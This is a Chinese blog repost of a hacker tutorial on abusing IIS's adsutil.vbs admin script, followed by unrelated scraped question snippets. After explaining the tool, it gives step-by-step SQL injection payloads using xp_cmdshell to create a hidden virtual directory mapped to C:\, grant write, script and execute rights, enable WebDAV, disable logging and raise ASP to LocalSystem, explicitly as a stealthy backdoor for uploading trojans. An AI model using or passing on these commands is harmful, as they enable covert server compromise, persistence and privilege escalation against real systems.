- ubuntu12.04环境下使用kvm ioctl接口实现最简单的虚拟机
- Ubuntu 通过无线网络安装Ubuntu Server启动系统后连接无线网络的方法
- 在Ubuntu上搭建网桥的方法
- ubuntu 虚拟机上网方式及相关配置详解
CFSDN坚持开源创造价值,我们致力于搭建一个资源共享平台,让每一个IT人在这里找到属于你的精彩世界.
这篇CFSDN的博客文章Adsutil.vbs 在脚本攻击中的妙用[我非我原创]由作者收集整理,如果你对这篇文章有兴趣,记得点赞哟.
1、简单介绍 adsutil.vbs是什么?相信用过IIS的网管员不会不知道。这是IIS自带的提供于命令行下管理IIS的一个脚本。位于%SystemDrive%\Inetpub\AdminScripts目录下。足足有95,426 字节大小。这么大的脚本一看就知道功能强大。事实也的确如此。基本上我的感觉它就是个命令行下的“Internet 信息服务管理器”。(事实上2000的服务器上%SystemDrive%\Inetpub\AdminScripts下原有20多个vbs文件以供管理。而到了2003则只剩下adsutil.vbs一个了。足以说明它的功能是多么复杂) 提到adsutil.vbs就不得不提到MetaBase.bin。这个文件是IIS最重要的配置文件。所有对IIS的设置最终都会储存在这个文件中。IIS管理器和adsutil.vbs就是通过对这个文件读取配置信息来显示给用户的。MetaBase.bin的储存结构十分像注册表,是一种树型储存结构。IIS管理器和adsutil.vbs通过一个Adspath的路径来访问MetaBase.bin。路径是由IIS:\开头,其中LocalHost表示本地服务器,而w3svc表示IIS服务。如IIS:\LocalHost/w3svc/1表示本地服务器上的第一个web站点。IIS:\LocalHost/w3svc/1/root/Vdir表示第一个web站点根目录下的Vdir虚拟目录。 有了这些前置知识,下面再回到adsutil.vbs来看看它的用法吧: C:\Inetpub\AdminScripts>cscript adsutil.vbs //别忘了键入cscript.exe这个脚本宿主文件名哦 Microsoft (R) Windows Script Host Version 5.6 版权所有(C) Microsoft Corporation 1996-2001。保留所有权利。 Usage: ADSUTIL.VBS <cmd> [<path> [<value>]] Description: IIS administration utility that enables the configuration of metabase properties . Supported Commands: //支持的命令。这个最重要 GET, SET, ENUM, DELETE, CREATE, COPY, APPCREATEINPROC, APPCREATEOUTPROC, APPCREATEPOOLPROC, APPDELETE, APPUNLOAD, AP PGETSTATUS Samples: //简单的几个例子 adsutil.vbs GET W3SVC/1/ServerBindings //查看第一个虚拟web站点的邦定端口。这里的W3SVC/1是IIS:\ LocalHostW3SVC/1的简写,而ServerBindings是他的属性。下同。 adsutil.vbs SET W3SVC/1/ServerBindings ":81:" //设定第一个虚拟web站点的邦定端口为81。 adsutil.vbs CREATE W3SVC/1/Root/MyVdir "IIsWebVirtualDir" //在第一个虚拟web站点根目录下建立一个MyVdir的虚拟目录。后面的"IIsWebVirtualDir"指的是目录类型。 adsutil.vbs START_SERVER W3SVC/1 //启动第一个虚拟web站点。 adsutil.vbs ENUM /P W3SVC //查看IIS的所有站点。 For Extended Help type: adsutil.vbs HELP //如果想要进一步的查看帮助,键入此命令。我这里就不转了。防止有人说我赚稿费。大家可以自己看看。 以上“//”后的文字都是我添加上去的注释(下同)。相信这样应该可以看懂了吧大家。 我们所常用的adsutil.vbs的命令有这么几个:GET, SET, ENUM, DELETE, CREATE。现在我来一一说明: GET命令通常是用来查看目录的各项属性值的。SET是用来设定目录属性用的。ENUM也是用来查看属性。所不同的是他直接把所有设置了的属性直接全部显示出来。通常一个目录就有好几页东西可看……他有个可选的“/p”开关符。加上了此开关的话。他只会列出此目录下的所有虚拟目录。DELETE命令是用来删除虚拟目录的。CREATE则是创建一个虚拟目录。另外还有几个命令:START_SERVER、STOP_SERVER、PAUSE_SERVER、CONTINUE _SERVER。分别是启动、停止、暂停、继续虚拟站点的运行。 一个虚拟目录的大致属性值如下(我只列出了可能我们所常用的,否则会太长了): KeyType : (STRING) "IIsWebVirtualDir" //目录类型,(STRING)说明它是个字符串类型的属性 AppRoot : (STRING) "/LM/W3SVC/1/ROOT" //目录IIS路径 AppFriendlyName : (STRING) "默认应用程序" //应用程序名 AppIsolated : (INTEGER) 2 //指定运行于进程外还是进程中,数字类型属性。 HttpCustomHeaders : (LIST) (1 Items) //自定义IIS数据头 "Powered By : www.WoFeiWo.Info" HttpErrors : (LIST) (42 Items) //各种IIS代码所返回的页面。可以自行设置。我这里将会显省略了。 DefaultDoc : (STRING) "Default.htm,index.htm,Default.asp,in dex.asp,Default.php,index.php,Default.aspx,index.aspx" //目录的默认主页面名称。 Path : (STRING) "D:\ftp" //目录所真正映射的物理路径 AccessFlags : (INTEGER) 513 //我也不知道这是啥。反正没设置过。好像会自动设置的 AccessExecute : (BOOLEAN) False //目录的执行权限,是布尔值 AccessSource : (BOOLEAN) False //目录的Webdav访问是否允许 AccessRead : (BOOLEAN) True //目录的只读权限 AccessWrite : (BOOLEAN) False //目录的写权限 AccessScript : (BOOLEAN) True //目录是否允许执行脚本 AccessNoRemoteExecute : (BOOLEAN) False AccessNoRemoteRead : (BOOLEAN) False AccessNoRemoteWrite : (BOOLEAN) False AccessNoRemoteScript : (BOOLEAN) False AccessNoPhysicalDir : (BOOLEAN) False ScriptMaps : (LIST) (27 Items) //应用程序扩展名映射 ".asa,C:\WINDOWS\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE" ".asp,C:\WINDOWS\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE" ".aspx,C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll,1,GET,HEA D,POST,DEBUG" ……………… //这里省略了n多数据 AspEnableParentPaths : (BOOLEAN) True AppPoolId : (STRING) "DefaultAppPool" //应用程序池名称 DontLog : (BOOLEAN) True //禁止IISLog纪录 DirBrowseFlags : (INTEGER) -1073741762 EnableDirBrowsing : (BOOLEAN) True //目录是否允许列目录 DirBrowseShowDate : (BOOLEAN) True //这里及以下都是显示目录时的参数设置。英文都很简单。我也就不多说了。 DirBrowseShowTime : (BOOLEAN) True DirBrowseShowSize : (BOOLEAN) True DirBrowseShowExtension : (BOOLEAN) True DirBrowseShowLongDate : (BOOLEAN) True EnableDefaultDoc : (BOOLEAN) True //是否开启默认主页文档 以上是我用cscript adsutil.vbs ENUM w3svc/1/root命令在自己机器上察看到的。大家也可以自己输入以上命令研究。 上面的属性我们都可以来通过SET命令来进行设置。如下方式: cscript adsutil.vbs SET w3svc/1/root/目录名/属性名 设置值 如:cscript adsutil.vbs SET w3svc/1/root/wofeiwo/AccessRead 1 //设置第一个虚拟web站点下的wofeiwo虚拟目录的可读权限为Ture 或:cscript adsutil.vbs SET w3svc/1/root/wofeiwo/Path “C:\” //设置目录的映射路径是“C:\” 下面来看看我们的简单利用的例子 2、adsutil.vbs的利用 (一)MSSQL Injection的上传新思路 或许大家会在MSSQL的注入中碰到这种情况:SA权限。可以执行Cmd命令(xp_cmdshell、sp_OACreate、Job等等)。可是服务器是在内网。外面是个堡垒主机。只是做了个80端口的映射。3389开了没有用(内网连不上啊),所有反向木马也传不上去(Tftp、Ftp、Wget、exe2bat等等)这时候你该怎么办? Amanl大哥经典的《榨干MSSQL最后一滴血》给我们一个很好的思路:就是利用%SystemDrive%\Inetpub\AdminScripts下的vbs建立一个新的虚拟目录。自定义其映射的绝对路径。这样可以绕过了对web绝对路径的猜解。然后通过BACKUP或MASKWEBTASK备份数据库或临时表到虚拟目录下(或是直接echo)就可以得到了一个shell。 上面的想法的确很好。可是用过臭要饭的GetWebShell或小竹的NBUpFile的人都知道BACKUP或MASKWEBTASK的成功率有多么的低……而echo……我也不想说了。一行一行写那简直是找罪受。(还要不停的转特殊字符……) 其实我们可以把Amanl大哥的想法改进一下。在我们建立一个新的虚拟目录的时候。可以加上写目录的权限。再加上Webdav……那么我们不久可以直接通过IIS上传任何文件了吗?也不仅仅局限于文本文件了。如果我们上传了个反向后门在通过SA执行……呵呵,一切就都搞定了! 来,马上实行: Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs CREATE w3svc/1/Root/wofeiwo "IIsWebVirtualDir"';-- Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs cscript adsutil.vbs SET w3svc/1/root/wofeiwo/Path “C:\”';-- 注意上面的特殊字符要自己转变。或者你可以用NBSI2或者小路的SQLCOMM来执行以上命令。 这样我们就在第一个web站点下建立了一个wofeiwo的虚拟目录,映射到了C:根目录。我再给他加上读和写的权限,为了要一个webshell ,我再加上执行脚本的权限: Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/AccessRead 1';-- Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/AccessWrite 1';-- Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/AccessScript 1';-- 写到这看过Surperhei《对IIS写权限的利用》的朋友可能会想要自己构造http包来上传文件。其实有更简单的方法: Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/EnableDirBrowsing 1';-- Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/AccessSource 1';-- 设置为允许列目录和webdav访问,然后打开你的IE,Ctrl+O打开“打开”对话框,键入你刚才设置的虚拟目录。选中“以Web文件夹方式打开”,确定。如图: 图一 啊哈!看到所有的文件夹了吗?如图所示: 图二 现在你就可以像操作普通文件夹一样操作以上文件了。还可以Ctrl+C、Ctrl+V复制文件呢。实现了方便上传、修改文件的功能。 (二)更进一步 其实我们完全可以更进一步利用上面所说的思路直接制作一个IIS后门。来,看我的实现!(这里使用了动鲨在《近乎完美的IIS后门》中所介绍的方法。不过我是直接用adsutil.vbs这个MS自带的工具完成了设置。对此文章感兴趣的朋友可以自己找来看看。) Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs CREATE w3svc/1/Root/wofeiwo "IIsWebVirtualDir"';-- //首先建立一个wofeiwo目录。 Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs CREATE w3svc/1/Root/wofeiwo/door "IIsWebVirtualDir"';-- //在wofeiwo目录下又建立了一个door目录。 Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs cscript adsutil.vbs SET w3svc/1/root/wofeiwo/door/Path “C:\”';-- //设置door目录映射到C:根目录。 Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessRead 1';-- //这里及以下都是给目录设置个种权限。可以参考以上的命令注释。 Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessWrite 1';-- Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessScript 1';-- Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/DontLog 1';-- Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/EnableDirBrowsing 1';-- Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessSource 1';-- Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessExecute 1';-- 可能会有人说,什么阿。不就是和上面的一样吗?呵呵。其实你仔细看。会发现我们上面新建的第一个目录“wofeiwo”并没有设置“Path”属性。也就是说他没有映射到任何实际的目录上去。这里应用了IIS的一个漏洞(涉及到IIS5.0.1.0)。即对于没有“Path”属性的虚拟目录是不会在IIS管理器中出现的。相当于一个隐藏的目录。而其下的虚拟目录“door”同样是由于上级目录不可见的,所以它也是不可见的!但是“door”目录是设置了“Path”属性的。所以如果我们提交http://IP/wofeiwo/door/ 路径。其结果是会返回C:下的文件目录。现在此目录已经是我们可以任意写文件读文件了。并且还可以转到System32目录下对程序进行运行。我们的后门雏形建成了。(注意看我这里是加上了AccessExecute执行权限的) 但是我们现在执行的程序都还是IIS默认的IUSR用户的Guest权限。没有大的权限我们总是不爽。下面来提升我们的权限,加IUSR用户为管理员就不说了。下面说说另两个方法: 1、设置AppIsolated,使此目录下程序在IIS的进程中进行。这样就继承了IIS的System权限。 Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/ AppIsolated 0';-- 2、 将解析asp文件的asp.dll加入到IIS的特权dll中。使得其在进程中运行。从而的到IIS的LocalSystem权限。 1)首先得到IIS所有的特权dll Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs GET w3svc/InProcessIsapiApps';-- 返回: InProcessIsapiApps : (LIST) (5 Items) "C:\WINDOWS\system32\inetsrv\httpext.dll" "C:\WINDOWS\system32\inetsrv\httpodbc.dll" "C:\WINDOWS\system32\inetsrv\ssinc.dll" "C:\WINDOWS\system32\msw3prt.dll" "C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll" 2) 将asp.dll设置到InProcessIsapiApps组中去,这里要注意,把上面的所有查到的dll都加上,否则会被删除。 Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/InProcessIsapiApps "C:\WINDOWS\system32\inetsrv\httpext.dll" "C:\WINDOWS\system32\inetsrv\httpodbc.dll" "C:\WINDOWS\system32\inetsrv\ssinc.dll" "C:\WINDOWS\system32\msw3prt.dll" "C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll" "C:\WINDOWS\system32\inetsrv\asp.dll"';-- 返回: InProcessIsapiApps : (LIST) "C:\WINDOWS\system32\inetsrv\httpext.dll" "C:\WINDOWS\system32\inetsrv\httpodbc.dll" "C:\WINDOWS\system32\inetsrv\ssinc.dll" "C:\WINDOWS\system32\msw3prt.dll" "C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll" "C:\WINDOWS\system32\inetsrv\asp.dll" 这样就设置好了。以后无论什么asp文件就都是 LoaclSystem权限了。通过以上的步骤。我们的IIS后门基本上就是设置好了。你可以上传asp木马加以辅助控制。这样的设置型后门是很难被管理员发现的。并且完全通过IIS的80端口通讯。又没有日志记录。所以相当安全。 3、结言 到这里我关于adsutil.vbs的一点简单应用就结束了。突然发现文章已经写了那么多了。哇啊啊……文章写得好累阿。由于本人是一菜鸟。文章难免有疏漏。还请大家多多指教。有什么疑问请和我联系。我的邮箱:wofeiwo@bugkidz.org。或者大家可以到火狐技术联盟http://www.wrsky.com来找我。我的ID:我非我。是论坛新手版的版主.
最后此篇关于Adsutil.vbs 在脚本攻击中的妙用[我非我原创]的文章就讲到这里了,如果你想了解更多关于Adsutil.vbs 在脚本攻击中的妙用[我非我原创]的内容请搜索CFSDN的文章或继续浏览相关文章,希望大家以后支持我的博客! 。
我有 powershell 脚本。通过调度程序,我运行 bat 文件,该文件运行 PS1 文件。 BAT文件 Powershell.exe -executionpolicy remotesigned
什么更快? 或者 $.getScript('../js/SOME.js', function (){ ... // with $.ajaxSetup({ cache: true });
需要bash脚本来显示文件 #!/bin/bash my_ls() { # save current directory then cd to "$1" pushd "$1" >/dev/nu
我有一个输入 csv 文件,实际上我需要在输入文件中选择第 2 列和第 3 列值,并且需要转换两个值的时区(从 PT 到 CT),转换后我需要替换转换后的时区值到文件。 注意: 所有输入日期值都在太平
我正在使用/etc/init.d/httpd 作为 init.d 脚本的模板。我了解文件中发生的所有内容,但以下行除外: LANG=$HTTPD_LANG daemon --pidfile=${pid
我有以下选择: python runscript.py -O start -a "-a "\"-o \\\"-f/dev/sda1 -b256k -Q8\\\" -l test -p maim\""
我对 shell 脚本完全陌生,但我需要编写一个 shell 脚本来检查文件是否存在,然后移动到另一个位置 这是我写的: 一旦设备崩溃,我就会在/storage/sdcard1/1 中收集日志 #!/
我正在使用 bash 脚本从文本文件中读取数据。 数据: 04:31 Alex M.O.R.P.H. & Natalie Gioia - My Heaven http://goo.gl/rMOa2q
这是单击按钮时运行的 javascript 的结尾 xmlObj.open ('GET', /ajax.php, true); xmlObj.send (''); } 所以这会执行根目录中的php脚本
关闭。这个问题需要debugging details .它目前不接受答案。 编辑问题以包含 desired behavior, a specific problem or error, and th
我需要将文件转换为可读流以通过 api 上传,有一个使用 fs.createReadStream 的 Node js 示例。任何人都可以告诉我上述声明的 python 等价物是什么? 例子 const
我有一个 shell 脚本 cron,它从同一目录调用 python 脚本,但是当这个 cron 执行时,我没有从我的 python 脚本中获得预期的输出,当我手动执行它时,我的 python 脚本的
如何使 XMLHttpRequest (ajax) 调用的 php 脚本安全。 我的意思是,不让 PHP 文件通过直接 url 运行,只能通过脚本从我的页面调用(我不想向未登录的用户显示数据库结果,并
我正在尝试添加以下内容 我正在使用经典的 asp。但我不断收到的错误是“一个脚本 block 不能放在另一个脚本 block 内。”我尝试了此处的 document.write 技术:Javasc
如何从另一个 PHP 脚本(如批处理文件)中运行多个 PHP 脚本?如果我了解 include 在做什么,我认为 include 不会起作用;因为我正在运行的每个文件都会重新声明一些相同的函数等。我想
我想创建具有动态内容的网页。我有一个 HTML 页面,我想从中调用一个 lua 脚本 如何调用 lua 脚本? ? ? 从中检索数据?我可以做类似的事情吗: int xx = 0; xx
我删除了我的第一个问题,并重新编写了更多细节和附加 jSfiddle domos。 我有一个脚本,它运行查询并返回数据,然后填充表。表中的行自动循环滚动。所有这些工作正常,并通过使用以下代码完成。然而
我尝试使用 amp 脚本,但收到此错误: “[amp-script] 脚本哈希未找到。amp-script[script="hello-world"].js 必须在元[name="amp-script
我有一个读取输入的 Shell 脚本 #!/bin/bash echo "Type the year that you want to check (4 digits), followed by [E
我正在从 nodejs 调用 Lua 脚本。我想传递一个数组作为参数。我在 Lua 中解析该数组时遇到问题。 下面是一个例子: var script = 'local actorlist = ARGV
我是一名优秀的程序员,十分优秀!